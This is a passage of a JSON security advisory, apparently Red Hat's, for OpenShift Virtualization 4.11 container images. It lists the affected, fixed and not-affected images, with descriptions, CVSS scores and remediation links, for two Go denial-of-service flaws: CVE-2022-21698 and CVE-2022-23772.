"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2045880" } ], "notes": [ { "category": "description", "text": "A denial of service attack was found in prometheus/client_golang. This flaw allows an attacker to produce a denial of service attack on an HTTP server by exploiting the InstrumentHandlerCounter function in the version below 1.11.1, resulting in a loss of availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "prometheus/client_golang: Denial of service using InstrumentHandlerCounter", "title": "Vulnerability summary" }, { "category": "other", "text": "This flaw has been rated as having a moderate impact for two main reasons. The opportunity for a Denial of Service is limited to the golang runtime. In the case of OpenShift Container Platform, this would be restricted within each individual container. Additionally, this is in alignment with upstream\u0027s (the Prometheus project) impact rating.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64" ], "known_not_affected": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-21698" }, { "category": "external", "summary": "RHBZ#2045880", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2045880" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-21698", "url": "https://www.cve.org/CVERecord?id=CVE-2022-21698" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21698" }, { "category": "external", "summary": "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", "url": "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p" } ], "release_date": "2022-02-15T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-14T19:28:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6526" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "prometheus/client_golang: Denial of service using InstrumentHandlerCounter" }, { "cve": "CVE-2022-23772", "cwe": { "id": "CWE-190", "name": "Integer Overflow or Wraparound" }, "discovery_date": "2022-02-11T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2053532" } ], "notes": [ { "category": "description", "text": "A flaw was found in the big package of the math library in golang. The Rat.SetString could cause an overflow, and if left unhandled, it could lead to excessive memory use. This issue could allow a remote attacker to impact the availability of the system.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Enterprise Linux 8 and 9 are affected, because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having Moderate security impact, and the issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7, hence, marked as Out-of-Support-Scope. \n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle \u0026 Updates Policy: https://access.redhat.com/support/policy/updates/errata/.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64" ], "known_not_affected": [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-23772" }, { "category": "external", "summary": "RHBZ#2053532", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053532" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-23772", "url": "https://www.cve.org/CVERecord?id=CVE-2022-23772" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-23772", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23772" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", "url": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ" } ], "release_date": "2022-01-19T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-14T19:28:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6526" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", 